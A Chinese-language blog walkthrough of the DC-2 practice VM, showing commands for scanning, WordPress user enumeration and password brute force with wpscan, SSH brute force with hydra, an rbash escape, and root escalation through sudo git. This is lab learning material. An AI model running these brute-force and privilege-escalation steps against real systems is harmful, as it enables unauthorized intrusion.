[渗透实战]:渗透测试实战-DC-2-靶机入侵

[渗透实战]:渗透测试实战-DC-2-靶机入侵

 
DC-2 靶机实战
 
    靶机资源下载:
    我的百度网盘
 
启动DC-2
 

image

配置其网络为NAT,查看其Mac 地址,重启DC-2 使其网路配置生效
 

image

使用nmap 扫描内网网段
 

image

 
得到DC-2 的IP地址192.168.1.162
 
对其进行信息收集
 

image

访问其IP ,连接失败
 

image

添加本地DNS解析
 
    vim /etc/hosts
 

image

再访问该网站,解析成功
 

image

 
flag1
 

image

 
cewl 工具
 
cewl dc-2 >pwd.dic
 
网站目录扫描
 
使用MSF 进行网站目录扫描
 
use auxiliary/scanner/http/dir_scanner
 
set RHOSTS 192.168.1.162
 
set THREADS 50
 
exploit
 

image

 
wpscan工具
 
    wpscan --update
 
    apt-get install wpscan wpscan   更新
 
    注:如果wpscan 无法使用,可以尝试更换新的kali 虚拟机,笔者就碰到类似的问题,安装 kali 2020.2 之后,wpscan 启动成功
 
    附清华大学开源镜像站kali2020.2(amd64,installer)下载链接
 
    https://mirrors.tuna.tsinghua.edu.cn/kali-images/current/kali-linux-2020.2-installer-amd64.iso
 
wpscan --url dc-2 -e u
 

image

wpscan 爆破用户
 
    wpscan --url dc-2 -U user.dic -P pwd.dic
 

image

 
flag2
 
192.168.1.162/wp-admin
 

image

 
使用jerry用户并用我们爆破出来的密码尝试登录
 

image

找到flag2
 

image

他告诉我们需要另辟蹊径,我们想到了刚开始使用nmap 扫描时,还扫出了ssh 端口7744
 
hydra 爆破ssh
 
    hydra -L user.dic -P pwd.dic ssh://192.168.1.162 -s 7744 -o hydra.ssh -vV
 
查看结果:
 

image

 
尝试使用ssh 登录
 
    ssh tom@192.168.1.162 -p 7744
 
查看当前目录文件
 
    ls
 
    cat flag3.txt
 
发现有rbash 命令限制
 

image

flag3
 
绕过限制
 
    BASH_CMDS[a]=/bin/sh;a
 
    /bin/bash
 
    export PATH=$PATH:/bin/
 
    export PATH=$PATH:/usr/bin
 

image

flag4
 
 
切换用户
 
切换jerry用户
 
    su jerry
 
输入密码,登录成功
 

image

我们进入到jerry 用户的家目录
 

image

执行命令,发现没有权限
 
final-flag
 
提权
 
查看具有root权限的命令
 
    sudo -l
 
发现git 命令具有root 权限,但是不需要提供给root 密码
 

image

 
git 提权
 
    sudo git -p --help
 
强制进入交互式状态,让页面缓冲区无法显示全部信息
 
    !/bin/bash
 

image

posted @ 2021-06-28 14:13  jpSpaceX  阅读(54)  评论(0编辑  收藏  举报